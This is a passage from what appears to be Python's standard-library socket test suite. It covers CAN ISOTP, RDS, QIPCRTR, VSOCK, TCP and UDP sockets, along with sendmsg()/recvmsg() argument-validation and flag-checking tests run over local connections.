@unittest.skipUnless(HAVE_SOCKET_CAN_ISOTP, 'CAN ISOTP required for this test.')
class ISOTPTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_ISOTP
socket.SOCK_DGRAM
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_ISOTP"),
'socket.CAN_ISOTP required for this test.')
def testCreateISOTPSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
pass
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
with self.assertRaisesRegex(OSError, 'interface name too long'):
s.bind(('x' * 1024, 1, 2))
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
addr = self.interface, 0x123, 0x456
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
@unittest.skipUnless(HAVE_SOCKET_QIPCRTR,
'QIPCRTR sockets required for this test.')
class BasicQIPCRTRTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_QIPCRTR
def testCreateSocket(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
pass
def testUnbound(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertEqual(s.getsockname()[1], 0)
def testBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
support.bind_port(s, host=s.getsockname()[0])
self.assertNotEqual(s.getsockname()[1], 0)
def testInvalidBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertRaises(OSError, support.bind_port, s, host=-2)
def testAutoBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
s.connect((123, 123))
self.assertNotEqual(s.getsockname()[1], 0)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
class BasicVSOCKTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_VSOCK
def testVSOCKConstants(self):
socket.SO_VM_SOCKETS_BUFFER_SIZE
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE
socket.VMADDR_CID_ANY
socket.VMADDR_PORT_ANY
socket.VMADDR_CID_HOST
socket.VM_SOCKETS_INVALID_VERSION
socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID
def testCreateSocket(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
pass
def testSocketBufferSize(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
orig_max = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE)
orig = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE)
orig_min = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE, orig_max * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE, orig * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE, orig_min * 2)
self.assertEqual(orig_max * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE))
self.assertEqual(orig * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE))
self.assertEqual(orig_min * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE))
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while 1:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and Recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = 3.0
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
try:
while True:
self.sendmsgToServer([b"a"*512])
except socket.timeout:
pass
except OSError as exc:
if exc.errno != errno.ENOMEM:
raise
# bpo-33937 the test randomly fails on Travis CI with
# "OSError: [Errno 12] Cannot allocate memory"
else:
self.fail("socket.timeout not raised")
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
# bpo-33937: catch also ENOMEM, the test randomly fails on Travis CI
# with "OSError: [Errno 12] Cannot allocate memory"
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK, errno.ENOMEM))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(socket.timeout,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
